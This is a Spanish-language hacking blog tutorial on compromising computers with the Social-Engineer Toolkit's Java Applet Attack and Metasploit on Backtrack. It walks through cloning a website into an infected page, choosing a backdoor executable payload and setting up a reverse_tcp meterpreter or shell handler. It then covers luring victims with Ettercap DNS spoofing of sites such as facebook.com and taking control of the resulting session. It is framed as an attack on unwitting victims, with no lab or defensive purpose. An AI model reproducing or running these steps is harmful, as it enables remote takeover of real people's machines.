SET y MetaSploit Java Applet Attack en Backtrack Tutorial ~ APK Hacks | Para expertos y principiantes!

6 de marzo de 2013

SET y MetaSploit Java Applet Attack en Backtrack Tutorial

Publicado por:APK Hacks | At:23:52
Java Applet Attack es uno de mis ataques preferidos. Es muy efectivo y discreto pero lo que mas me gusta de el es lo fácil que es llevarlo a cabo. Solo necesitas tener Backtrack y tener instalado solo 2 aplicaciones: SET y MetaSploit


Java applet Attack afecta:
  • Windows Systems
  • Linux Systems and
  • Mac OS X
Instrucciones:

1. Primero ejecutamos la aplicacion SET yendo a: Applications >> BackTrack >> Exploitation Tools >> Social Engineering Tools >> Social Engineering Toolkits >> SET                                      
2. Una vez iniciado SET, elegimos la opción 2) Website Attack Vector. Para ello ponemos 2 y le damos a enter.
3. Ahora nos aparecerá otro menú como el de la imagen de abajo en el que seleccionaremos la opción 1) Java Applet Attack Method (de la misma manera que el paso anterior reemplazando el 2 por el 1)     

                                                                              
4. A continuación aparecerá otro menú en el que seleccionaremos la opción 2) Site Cloner  

                               
5. Ahora tendremos que introducir la pagina que queremos clonar para que sea nuestra pagina infectada. Podemos introducir cualquiera por ejemplo: www.apk-hacks.blogspot.com     

  

6. El siguiente paso consiste en elegir que Payload vamos a utilizar, en este caso vamos a seleccionar la siguiente:                                


7. A continuacion vamos a tener que elegir que metodo de encripcion vamos a querer. Nosotros vamos a usar 16) Backdoor Executable (BEST)


8. Lo siguiente va a ser elegir el puerto que queramos utilizar. (podemos darle directamente a enter para que SET elija el puerto)


9. Una vez seleccionado el puerto, SET iniciara MetaSploit


10. Una vez iniciado MetaSploit tendremos que ejecutar los siguientes comandos:
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp (para ataques a Windows)
  • set payload linux/x86/shell/reverse_tcp (para ataques a Linux)
  • set LHOST "nuestra ip local"
  • set LPORT "puerto que querramos utilizar"
  • set ExitOnSession false
  • exploit -j


11. Ahora lo unico que nos queda es hacer que nuestra victima entre a nuestra pagina infectada, para eso podemos utilizar Ettercap para rediccionar cualquier pagina, por ejemplo: www.facebook.com , a nuestra pagina infectada que sera la indicada en la imagen superior. Para saber como hacerlo lee DNS Spoofing con Ettercap en Backtrack Tutorial

12. Una vez que logramos que nuestra victima entre a nuestra pagina infectada, se le solicitará en una pequeña ventana que ejecute una aplicación de Java que requiere el sitio infectado, el cual la victima desconoce, por lo tanto el %99 de las personas la ejecutara. Cuando la victima le da a ejecutar, automáticamente se conecta a el ordenador del atacante proporcionándole control total de la victima.



13. Asi se vera cuando la victima haya caído en nuestra trampa:



14. Como vimos en la imagen anterior, se creo una sesion cuando recivimos la conexion de la victima. Lo que debemos hacer ahora para tomar el control de esa sesion es ejecutar el siguiente comando:
  • session -i 1



















Categorias: , , , , ,
Powered by KikBooks Widget